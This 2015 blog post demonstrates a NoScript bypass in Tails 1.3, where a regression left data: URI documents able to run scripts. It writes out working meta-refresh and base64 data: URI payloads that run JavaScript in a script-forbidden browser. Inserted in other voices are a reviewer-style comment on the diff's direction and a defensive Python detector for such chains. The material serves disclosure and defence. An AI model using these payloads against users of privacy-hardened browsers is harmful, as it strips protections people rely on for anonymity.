Title: NoScript script-disabled bypass PoC for Tails 1.3
Date: 2015-03-01 13:30

A couple of days ago, the [Tails]( https://tails.boum.org ) developers discovered that they had missed a
[NoScript]( https://noscript.net ) update for Tails 1.3 by a couple of hours.
It fixes an interesting regression:

> v 2.6.9.15
> =============================================================
> + Fixed regression in 2.6.9.12 causing data: URI documents
>   to be scripting-enabled (thanks GOF for tweet)

I know that [Giorgio]( https://maone.net/ ) has some semi-private PoCs,
but they are not working great in Tails, so I thought about giving it a try.

This is the relevant excerpt of the
[diff]( https://addons.mozilla.org/en-US/firefox/files/compare/299406...299702/file/components/noscriptService.js#top )
with `site` indicating a *normal* URL, and `!site` a *special* one, like [data:]( https://tools.ietf.org/html/rfc2397 ):

```diff
-       blockIt = !site || (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
+       blockIt = site && (this.usingCAPS && !this.restrictSubdocScripting ? this.isUntrusted(site) : !this.isJSEnabled(site));
```
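Review bot: the two lines differ only when `site` is falsy, i.e. the `!site` special-URL case defined just above; for a normal URL both evaluate to the same `this.isUntrusted(site)` / `!this.isJSEnabled(site)` expression. In that special case the `-` line forces `blockIt = true` and the `+` line yields `false`, so read against the 2.6.9.15 changelog entry quoted above ("data: URI documents to be scripting-enabled"), the `+` side is the one that leaves `data:` documents scripting-enabled. It would help to state which side of the `299406...299702` compare is the fixed build, or to say explicitly that the excerpt is shown in the direction that introduced the regression; as quoted, a reader who pairs it with the changelog draws the opposite conclusion.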

At first, I was thinking about using the classic thing:

```html
<a target=_blank href="data:text/html,<script>alert(1)</script>">clic</a>
```

But it seems that you need to refresh the page to trigger the JavaScript.

```html
<a target=_blank href="data:text/html,<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">clic</a>
```

This is working! Time to improve it: why not use `refresh` twice?
One time to load our payload, and another one to trigger it.

```html
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html, <META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>">
```

![Noscript bypass in Tails 1.3]( {static}/images/noscript_tails.png )
Yay!

If you're <s>lazy</s> clever, you could of course use the
[HTTP Location]( https://en.wikipedia.org/wiki/HTTP_location ) header instead; it'll work too.
And since the `data:` URL scheme supports base64, you can encode your payload for even more l33tness:

```html
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PE1FVEEgSFRUUC1FUVVJVj0ncmVmcmVzaCcgQ09OVEVOVD0nMCc+PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=">
```

Hurray, you can now run your JavaScript-powered 0-days in script-forbidden Tails!
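From the defender's side, the refresh-into-`data:` chain described above is easy to spot before a browser ever follows it. The following Python is an added example, not code from this post or from NoScript: it extracts the `url=` target of a meta refresh, decodes the `data:` URI (percent-encoded or `;base64`, the two forms used on this page), follows the chain, and reports whether a `<script>` tag turns up inside a document reached through a `data:` URI. It is fed the two payloads shown above plus a constructed benign redirect and a constructed `Location`-style value; the regex, the function names, the report keys and the hop limit are my own assumptions.

```python
import base64
import re
from urllib.parse import unquote

# Regex approximation of <meta http-equiv="refresh" content="..."> (assumes the
# http-equiv attribute precedes content; a production scanner should use an HTML
# parser instead). The lazy [^>]*? matters: a greedy match would latch onto the
# second META tag nested inside the content attribute of the payloads above.
META_REFRESH_RE = re.compile(
    r"""<meta\s+[^>]*?http-equiv\s*=\s*['"]?refresh['"]?[^>]*?content\s*=\s*(['"])(.*?)\1""",
    re.IGNORECASE | re.DOTALL,
)
SCRIPT_RE = re.compile(r"<script\b", re.IGNORECASE)


def refresh_target(html):
    """Return the url= part of the first meta refresh in html, or None if absent."""
    m = META_REFRESH_RE.search(html)
    if not m:
        return None
    _, sep, rest = m.group(2).partition(";")  # "0;url=..." -> "url=..."
    rest = rest.strip()
    if sep and rest.lower().startswith("url="):
        return rest[4:].strip().strip("'\"")
    return None  # content="0" style refresh: reloads the same document


def decode_data_uri(uri):
    """Decode an RFC 2397 data: URI into (mediatype, body); handles ;base64 and %xx."""
    if not uri.lower().startswith("data:"):
        raise ValueError("not a data: URI")
    header, sep, payload = uri[5:].partition(",")
    if not sep:
        raise ValueError("malformed data: URI (no comma)")
    params = [p.strip().lower() for p in header.split(";")]
    mediatype = params[0] or "text/plain"
    if "base64" in params[1:]:
        body = base64.b64decode(payload).decode("utf-8", "replace")
    else:
        body = unquote(payload)
    return mediatype, body


def analyze_document(start, max_hops=5):
    """Follow meta refresh hops from an HTML document, or from a bare redirect
    target as an HTTP Location header would carry it. Reports whether the chain
    enters a data: URI and whether a <script> tag appears in a document that was
    decoded from one (script text sitting inside an attribute of the outer page
    is deliberately not counted)."""
    report = {"hops": 0, "data_uri": False, "script_in_data": False, "chain": []}
    current = start.strip()
    for _ in range(max_hops + 1):
        from_data = current.lower().startswith("data:")
        if from_data:
            report["data_uri"] = True
            _, current = decode_data_uri(current)
        report["chain"].append(current)
        if from_data and SCRIPT_RE.search(current):
            report["script_in_data"] = True
        target = refresh_target(current)
        if target is None:
            break  # plain document, or an http(s) URL we do not fetch offline
        report["hops"] += 1
        current = target.strip()
    return report


# Samples: the first two are the payloads from this post, the last two are constructed.
NESTED_REFRESH = ('<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html, '
                  "<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>\">")
BASE64_TARGET = ("data:text/html;base64,PE1FVEEgSFRUUC1FUVVJVj0ncmVmcmVzaCcgQ09OVEVOVD0nMCc+"
                 "PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pgo=")
BASE64_REFRESH = f'<META HTTP-EQUIV="refresh" CONTENT="0;url={BASE64_TARGET}">'
LOCATION_VALUE = "data:text/html,<META HTTP-EQUIV='refresh' CONTENT='0'><script>alert(1)</script>"
BENIGN_REFRESH = '<meta http-equiv="refresh" content="5; url=https://example.invalid/">'

if __name__ == "__main__":
    for name, sample in [("nested", NESTED_REFRESH), ("base64", BASE64_REFRESH),
                         ("location", LOCATION_VALUE), ("benign", BENIGN_REFRESH)]:
        r = analyze_document(sample)
        print(f"{name}: hops={r['hops']} data_uri={r['data_uri']} "
              f"script_in_data={r['script_in_data']}")
```

Run stand-alone it prints one line per sample; the two payloads from the post and the `Location`-style value report `script_in_data=True`, the benign redirect does not. Only `<script>` inside a decoded `data:` document is counted, so the outer page of the nested payload (where the script text only sits inside an attribute value) is not itself flagged, which keeps the check focused on what the browser would actually end up executing.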

edit: As [said by Giorgio]( https://mailman.boum.org/pipermail/tails-dev/2015-March/008293.html ),
this regression isn't that interesting, since it will be considered cross-domain to everything.
